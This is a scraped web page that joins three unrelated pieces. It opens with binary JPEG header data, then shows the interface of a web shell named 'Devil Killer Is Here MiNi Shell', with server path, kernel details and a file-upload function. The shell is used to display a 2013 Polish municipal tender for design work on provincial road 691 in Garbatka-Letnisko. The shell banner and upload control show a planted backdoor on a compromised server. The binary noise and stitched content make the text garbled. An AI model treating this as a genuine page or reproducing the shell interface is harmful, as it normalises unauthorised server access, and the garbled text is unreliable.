JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130903/355036-N-2013.html

<p class="kh_header"><b>Garbatka-Letnisko: Opracowanie dokumentacji projektowej przebudowy drogi wojewódzkiej Nr 691 ul. Kochanowskiego w miejscowości Garbatka Letnisko, na odcinkach: od km 11 + 147,82 do km 11 + 710,38; od km 12 + 683 do km 13 + 322</b><br>
<b>Numer ogłoszenia: 355036 - 2013; data zamieszczenia: 03.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Garbatka-Letnisko , ul. Skrzyńskich 1, 26-930 Garbatka-Letnisko, woj. mazowieckie, tel. 48 6210194, 6210163 w. 22, faks 48 6210054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.garbatkaletnisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej przebudowy drogi wojewódzkiej Nr 691 ul. Kochanowskiego w miejscowości Garbatka Letnisko, na odcinkach: od km 11 + 147,82 do km 11 + 710,38; od km 12 + 683 do km 13 + 322.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Opracowanie dokumentacji projektowej przebudowy drogi wojewódzkiej Nr 691 ul. Kochanowskiego w miejscowości Garbatka Letnisko, na odcinkach od km 11 plus 147,82 do km 11 plus 710,38; od km 12 plus 683 do km 13plus322. Zakres prac projektowych dla odcinka od km 11plus147,82 do km 11plus710,38. Projekt należy wykonać zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowanie Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. Dz. U. Nr 43 poz. 430 ze zm Ponadto należy uwzględnić wytyczne podane przez Mazowiecki Zarząd Dróg Wojewódzkich w Warszawie, Rejon Drogowy Radomiu Szerokość jezdni 7 m przekrój uliczny Konstrukcja drogi dla ruchu KR 3, KR 4 zaprojektowana w oparciu o wyniki badań geologicznych podłoża i natężenia ruchu drogowego dokonanych przez Wykonawcę, Odwodnienie drogi zapewniające prawidłowe odprowadzenie wód opadowych poza pas drogowy kanalizacja deszczowa, Chodniki zlokalizowane przy jezdni o szerokości min. 2,00m z kostki betonowej szarej grubości 6 cm na podsypce cementowo piaskowej 3 cm oraz na podbudowie z kruszyw łamanych i na warstwie odsączającej, oddzielone od jezdni krawężnikiem betonowym 20x30 cm, Chodniki zlokalizowane poza pasem zieleni o szer. min. 1,50 m z kostki betonowej szarej grubości 6 cm na podsypce cementowopiaskowej i na warstwie odsączającej, Cieki przy krawędzi jezdni z kostki betonowej typu HOLLAND, Warstwa wiążąca i warstwa ścieralna jedni z polimeroasfaltem odporne na okleinowanie, Ewentualne zatoki autobusowe o nawierzchni betonowej lub z kostki wibroprasowanej; Ewentualne cięgi pieszorowerowe o szerokości 3 m zlokalizowane bezpośrednio przy jezdni z wydzielonym pasem jezdnym dla rowerów lub 2,50 m zlokalizowane poza pasem zieleni, Zjazdy indywidualne o szerokości bram wjazdowych na posesję min. 4 m ze skosami 1:1 lub z łukami z kostki brukowej koloru czerwonego grubości 8 cm na podsypce cementowopiaskowej 3 cm oraz na odpowiedniej podbudowie i warstwie odsączającej; Włączenia dróg publicznych uzgodnione z zarządcami w konstrukcji jak droga wojewódzka, Oznakowanie pionowe drogi znakami średnimi typ 2 foliowane, Oznakowanie poziome jezdni cienkowarstwowe, Kompletne przygotowanie dokumentacji projektowej wymaga Uzyskania pozytywnej opinii Departamentu Nieruchomości i Infrastruktury Urzędu Marszałkowskiego w Warszawie w zakresie rozwiązań geometrycznych drogi, Uzgodnienia konstrukcji drogi w Mazowieckim Zarządzie Dróg Wojewódzkich w Warszawie, Czytelnego zaznaczenia granic i numeracji działek w projekcie zagospodarowania terenu, zgodnie ze stanem wykazanym w ewidencji gruntów prowadzącej przez Starostę kozienickiego, Uzgodnienia projektu ze wszystkimi właścicielami występujących mediów w pasie drogowym, Uzyskania pisemnej zgody na dysponowanie terenem na cele budowlane od właścicieli i użytkowników wieczystych nieruchomości zajętych pod projektowaną inwestycję, Protokólarnego uzgodnienia przebudowy zjazdów z właścicielami nieruchomości przyległych do drogi przy udziale Projektanta, Przedstawiciela Gminy, i Kierownika Obwodu Drogowego Siczki, Poddania projektu do wstępnej kontroli w MZDW Rejonie Drogowym w Radomiu, celem zaopiniowania i jej uzgodnienia z Radą Techniczną działającą w MZDW w Warszawie, Przed dokonaniem końcowego odbioru dokumentacji projektowej będącej przedmiotem zamówienia Projektant zobowiązany jest do uzyskania pozytywnej weryfikacji przedmiotowej dokumentacji przez MZDW w Warszawie, Opracowania operatów wodnoprawnych i uzyskania pozwoleń wodnoprawnych na ewentualną przebudowę urządzeń wodnych i na zrzut wód z kanalizacji deszczowej, Przygotowanie wniosków wraz z niezbędnymi załącznikami o uzyskanie decyzji, opinii, zgód i uzgodnień wymienionych w pkt poniżej, Uzyskania opinii Zespołu ds. Koordynacji Usytuowania Projektowanych Sieci Uzbrojenia Terenu w Kozienicach, prawomocnych decyzji o ustaleniu lokalizacji inwestycji celu publicznego, decyzji o środowiskowych uwarunkowaniach oraz decyzji pozwolenia na wycinkę drzew o ile będą wymagane oraz innych wymaganych obowiązującymi na dzień składania projektu przepisami decyzji, zgód, opinii, uzgodnień wynikających z wydanych decyzji oraz innych przepisów, Opracowania przedmiarów robót, kosztorysów i specyfikacji technicznych wykonania i odbioru robót, Opracowania i zatwierdzenia w Urzędzie Marszałkowskim w Warszawie projektów stałej i czasowej organizacji ruchu, Dokumentację należy uzgodnić z Generalną Dyrekcją Dróg Krajowych i Autostrad Oddział w Warszawie ul. Mińska 25, 03-808 Warszawa. Dokumentacja projektowa winna zawierać: Wersja papierowa: Opracowanie dokumentacji projektowej oddzielnie dla każdej branży zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późn. zm., w tym projektu budowlanego i wykonawczego, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego Dz. U. Nr 120, poz. 1133 z późń. zm. oraz inne opracowania niezbędne do wykonania kompletnego przedmiotu zamówienia w ilości po 6 egzemplarzy, Dokumentację Wykonawca winien sporządzić na aktualnych mapach sytuacyjnowysokościowych do celów projektowych dot. terenu objętego zamówieniem. Mapy winny być opracowane zgodnie ze standardami technicznymi dotyczącymi wykonywania prac geodezyjnych, wynikającymi z obowiązujących przepisów w tym zakresie, Wykonanie kosztorysów inwestorskich oddzielnie dla każdej branży opracowanych według rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego Dz. U. Nr 130, poz. 1389 wraz ze zbiorczym zestawieniem kosztów inwestycji w ilości po 2 egz., Opracowanie specyfikacji technicznych wykonania i odbioru robót oddzielnie dla każdej branży zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późń. zm w ilości 2 egz., Opracowanie przedmiaru robót oddzielnie dla każdej branży na bazie specyfikacji technicznych wykonania i odbioru robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późń. zm. w ilości 2 egz., Projekty stałej organizacji ruchu zatwierdzony w ilości 6 egz., Projekt czasowej organizacji ruchu zatwierdzony w ilości 6 egz., Plan BIOZ w ilości 6 egz., Opinie, uzgodnienia, operaty w tym operat wodno prawny, decyzje, pełne wypisy z rejestrów gruntów na działki zajęte pod drogę, Projekty przebudowy lub dobudowy uzbrojenia terenu dla potrzeb nowego układu komunikacyjnego lub kolidującego z projektowanym układem, oddzielnie dla każdej branży, Wykonawca winien uzyskać w imieniu Zamawiającego warunki techniczne dla planowanego przedsięwzięcia odnośnie włączenia do dróg publicznych oraz przebudowy i budowy sieci jeżeli zarządca drogi i właściciele sieci tego wymagają, Opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż, niezbędnego do ogłoszenia przetargu na realizację inwestycji zgodnie z opracowanym projektem wykonawczym 1 egz. wraz z wersją elektroniczną na płycie CD. Wersja elektroniczna płyta CD 2 szt. Projekty budowlane, wykonawcze i specyfikacje techniczne oddzielnie dla poszczególnych branż, Przedmiary robót i kosztorysy oddzielnie dla poszczególnych branż, Projekty stałej i czasowej organizacji ruchu; Plany wycinki drzew i wyceny drewna. Zakres prac projektowych dla odcinka od km 12plus683 do km 13plus322. Projekt należy wykonać zgodnie z warunkami technicznymi, jakim powinny odpowiadać drogi publiczne i ich usytuowania Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. Dz. U. Nr 43 poz. 430 ze zm. Ponadto należy uwzględnić wytyczne podane przez Mazowiecki Zarząd Dróg Wojewódzkich w Warszawie, Rejon Drogowy Radomiu Szerokość jezdni 7 m przekrój uliczny, Konstrukcja drogi dla ruchu KR 3, KR 4 zaprojektowana w oparciu o wyniki badań geologicznych podłoża i natężenia ruchu drogowego dokonanych przez Wykonawcę, Odwodnienie drogi zapewniające prawidłowe odprowadzenie wód opadowych poza pas drogowy kanalizacja deszczowa, Chodniki zlokalizowane przy jezdni o szerokości min. 2,00m z kostki betonowej szarej grubości 6 cm na podsypce cementowo piaskowej 3 cm oraz na podbudowie z kruszyw łamanych i na warstwie odsączającej, oddzielone od jezdni krawężnikiem betonowym 20x30 cm, Chodniki zlokalizowane poza pasem zieleni o szer. min. 1,50 m z kostki betonowej szarej grubości 6 cm na podsypce cementowopiaskowej i na warstwie odsączającej Cieki przy krawędzi jezdni z kostki betonowej typu HOLLAND, Warstwa wiążąca i warstwa ścieralna jedni z polimeroasfaltem odporne na okleinowanie, Ewentualne zatoki autobusowe o nawierzchni betonowej lub z kostki wibroprasowanej, Ewentualne cięgi pieszorowerowe o szerokości 3 m zlokalizowane bezpośrednio przy jedni z wydzielonym pasem jezdnym dla rowerów lub 2,50 m zlokalizowane poza pasem zieleni; Zjazdy indywidualne o szerokości bram wjazdowych na posesję min. 4 m ze skosami 1:1 lub z łukami z kostki brukowej koloru czerwonego grubości 8 cm na podsypce cementowopiaskowej 3 cm oraz na odpowiedniej podbudowie i warstwie odsączającej, Włączenia dróg publicznych uzgodnione z zarządcami w konstrukcji jak droga wojewódzka, Oznakowanie pionowe drogi znakami średnimi typ 2 foliowane, Oznakowanie poziome jezdni cienkowarstwowe, Kompletne przygotowanie dokumentacji projektowej wymaga Uzyskania pozytywnej opinii Departamentu Nieruchomości i Infrastruktury Urzędu Marszałkowskiego w Warszawie w zakresie rozwiązań geometrycznych drogi. Uzgodnienia konstrukcji drogi w Mazowieckim Zarządzie Dróg Wojewódzkich w Warszawie. Czytelnego zaznaczenia granic i numeracji działek w projekcie zagospodarowania terenu, Uzgodnienia projektu ze wszystkimi właścicielami występujących mediów w pasie drogowym, Uzyskania pisemnej zgody na dysponowanie terenem na cele budowlane od właścicieli i użytkowników wieczystych nieruchomości zajętych pod projektowaną inwestycję w tym PKP, Protokólarnego uzgodnienia przebudowy zjazdów z właścicielami nieruchomości przyległych do drogi przy udziale Projektanta, Przedstawiciela Gminy i Kierownika Obwodu Drogowego Siczki, Poddania projektu do wstępnej kontroli w MZDW Rejonie Drogowym w Radomiu, celem zaopiniowania i jej uzgodnienia z Radą Techniczną działającą w MZDW w Warszawie, Przed dokonaniem końcowego odbioru dokumentacji projektowej będącej przedmiotem zamówienia Projektant zobowiązany jest do uzyskania pozytywnej weryfikacji przedmiotowej dokumentacji przez MZDW w Warszawie, Opracowania operatów wodnoprawnych i uzyskania pozwoleń wodnoprawnych na ewentualną przebudowę urządzeń wodnych i na zrzut wód z kanalizacji deszczowej, Przygotowanie wniosków wraz z niezbędnymi załącznikami o uzyskanie decyzji, opinii, zgód i uzgodnień wymienionych w punkcie poniżej. Uzyskania: opinii Zespołu ds. Koordynacji Usytuowania Projektowanych Sieci Uzbrojenia Terenu w Kozienicach, prawomocnych decyzji o ustaleniu lokalizacji inwestycji celu publicznego, decyzji o środowiskowych uwarunkowaniach oraz decyzji pozwolenia na wycinkę drzew o ile będą wymagane oraz innych wymaganych obowiązującymi na dzień składania projektu przepisami decyzji, zgód, opinii, uzgodnień wynikających z wydanych decyzji oraz innych przepisów. Opracowania przedmiarów robót, kosztorysów i specyfikacji technicznych wykonania i odbioru robót. Opracowania i zatwierdzenia w Urzędzie Marszałkowskim w Warszawie projektów stałej i czasowej organizacji ruchu. Należy uzgodnić z Zamawiającym miejsce i sposób odprowadzenia wód deszczowych. Proponowana lokalizacja zbiornika ewaporacyjnego na terenach PKP w okolicach ul. 15 go Stycznia. Projekt obejmować będzie również wykonanie kanalizacji deszczowej w ul. 15 go Stycznia oraz jej przebudowę. Dokumentacja projektowa winna zawierać Wersja papierowa, Opracowanie dokumentacji projektowej oddzielnie dla każdej branży zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późn. zm., w tym projektu budowlanego i wykonawczego, zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego Dz. U. Nr 120, poz. 1133 z późń. zm. oraz inne opracowania niezbędne do wykonania kompletnego przedmiotu zamówienia w ilości 6 egzemplarzy, Dokumentację Wykonawca winien sporządzić na aktualnych mapach sytuacyjno wysokościowych do celów projektowych dot. terenu objętego zamówieniem. Mapy winny być opracowane zgodnie ze standardami technicznymi dotyczącymi wykonywania prac geodezyjnych, wynikającymi z obowiązujących przepisów w tym zakresie, Wykonanie kosztorysów inwestorskich oddzielnie dla każdej branży opracowanych według rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego Dz. U. Nr 130, poz. 1389 wraz ze zbiorczym zestawieniem kosztów inwestycji w ilości 2 egz., Opracowanie specyfikacji technicznych wykonania i odbioru robót oddzielnie dla każdej branży zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późń. zm. w ilości 2 egz., Opracowanie przedmiaru robót oddzielnie dla każdej branży na bazie specyfikacji technicznych wykonania i odbioru robót zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego Dz. U. Nr 202, poz. 2072 z późń. zm. w ilości 2 egz., Projekty stałej organizacji ruchu zatwierdzony w ilości 6 egz., Projekt czasowej organizacji ruchu zatwierdzony w ilości 6 egz., Plan BIOZ w ilości 6 egz., Opinie, uzgodnienia, operaty w tym operat wodno prawny, decyzje, pełne wypisy z rejestrów gruntów na działki zajęte pod drogę, Projekty przebudowy lub dobudowy uzbrojenia terenu dla potrzeb nowego układu komunikacyjnego lub kolidującego z projektowanym układem, oddzielnie dla każdej branży, Wykonawca winien uzyskać w imieniu Zamawiającego warunki techniczne dla planowanego przedsięwzięcia odnośnie włączenia do dróg publicznych oraz przebudowy i budowy sieci jeżeli zarządca drogi i właściciele sieci tego wymagają. Opracowanie opisu przedmiotu zamówienia dotyczącego wszystkich branż, niezbędnego do ogłoszenia przetargu na realizację inwestycji zgodnie z opracowanym projektem wykonawczym 1 egz. wraz z wersją elektroniczną na płycie CD. Wersja elektroniczna płyta CD 2 szt. Projekty budowlane, wykonawcze i specyfikacje techniczne oddzielnie dla poszczególnych branż, Przedmiary robót i kosztorysy oddzielnie dla poszczególnych branż, Projekty stałej i czasowej organizacji ruchu, Plany wycinki drzew i wyceny drewna. Inne postanowienia. Wykonawca zobowiązuje się wykonać przedmiot umowy zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami oraz normami i normatywami. Przedmiot umowy winien spełniać wymagania obowiązujące na dzień odbioru przez Zamawiającego kompletnej dokumentacji projektowej. Wykonawca zobowiązany będzie do bieżącego informowania Zamawiającego o toku postępowania w pracach projektowych. Mazowiecki Zarząd Dróg Wojewódzkich upoważni projektanta do załatwiania spraw związanych z uzyskaniem wszelkich decyzji, zgód, opinii, uzgodnień niezbędnych do realizacji przedmiotu zamówienia. Zaleca się przeprowadzenie szczegółowej wizji lokalnej celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy Wykonawca ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia. W dokumentacji projektowej nie należy odnosić się do konkretnej marki ani źródła, znaku handlowego, patentu, typu, pochodzenia lub produkcji. W przypadku, gdy jest to niezbędne dla dostatecznie precyzyjnego i zrozumiałego opisu, należy wskazać dopuszczalne rozwiązania równoważne opisywanym wraz z podaniem parametrów równoważności. W ramach oferowanego wynagrodzenia ryczałtowego Wykonawca przenosi na Zamawiającego pełne autorskie prawa majątkowe do dokumentacji projektowej stworzonej przez Wykonawcę i podległe mu osoby. Zamawiający nabywa prawo do korzystania z dzieła będącego przedmiotem zamówienia na polach eksploatacji określonych w art. 50 pkt 1,2,3 ustawy z dnia 04.02.1994r o prawie autorskim i prawach pokrewnych tekst jednolity Dz. U. z 2006 roku, Nr 90, poz. 631 z późn. zm. Zamawiający ma prawo do wykorzystania dokumentacji projektowej w tym do powielenia dokumentacji projektowej lub jej części dowolną techniką, wprowadzenia dokumentacji projektowej do pamięci komputera, wykorzystania dokumentacji projektowej, będącej przedmiotem niniejszej umowy w postępowaniu o udzielenie zamówienia publicznego, w szczególności poprzez włączenie do jej opisu istotnych warunków zamówienia oraz udostępnienie jej lub jej części wszystkim zainteresowanym tym postępowaniem, w zakresie obrotu przekazanym przez Wykonawcę oryginałem albo egzemplarzami na których dzieło utwór utrwalono. Nabyte prawa są nieograniczone w czasie. Wykonawca zgadza się na wykonanie przez Zamawiającego autorskich praw zależnych, bez uszczerbku dla prawa do utworu pierwotnego. Zamawiający zobowiązuje się zachować osobiste prawa autorskie twórców. Z chwilą dokonania odbioru własność egzemplarzy, na których utrwalono projekt przechodzi na Zamawiającego. W ramach oferowanego wynagrodzenia ryczałtowego Wykonawca zobowiązuje się do przygotowania propozycji odpowiedzi na ewentualne pytania natury technicznej, skierowane do Zamawiającego przez Wykonawców na etapie prowadzenia procedury przetargowej na budowę zaprojektowanego budynku, w terminie dwóch dni roboczych od dnia otrzymania pytań przez Wykonawcę.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga zabezpieczenia swojej oferty wadium w wysokości 3000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny sepłniania tego warunku: Zamawiający nie precyzuje wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wymienionego w rozdz. IX pkt 1 ppkt 1 siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  wraz z podaniem ich wartości, dat wykonania i podmiotów na rzecz których usługi zostały wykonane wraz z załączeniem dowodów *czy zostały wykonane lub są wykonywane należycie.
W okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum 1 zamówienie o podobnym charakterze      i zakresie jak przedmiot zamówienia, tj.: opracował kompleksową dokumentację projektową wraz z podaniem jej wartości, dat wykonania i podmiotów na rzecz których usługi zostały wykonane wraz z załączeniem dowodów *czy zostały wykonane lub są wykonywane należycie.
Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczeń 
i dokumentów wymienionych w  rozdz. IX  pkt 2 ppkt 4  siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny sepłniania tego warunku: Zamawiający nie precyzuje wymagań w tym zakresie. Ocena spełniania tego warunku zostanie dokonana na podstawie oświadczenia wymienionego w rozdz. IX pkt 1 ppkt 1 siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, że dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Przedstawi oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  tj.: zapewni zespół projektantów z uprawnieniami do projektowania w specjalności:
- drogowej - min. 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalności drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów; osoba ta będzie koordynatorem wszystkich prac objętych przedmiotem zamówienia,
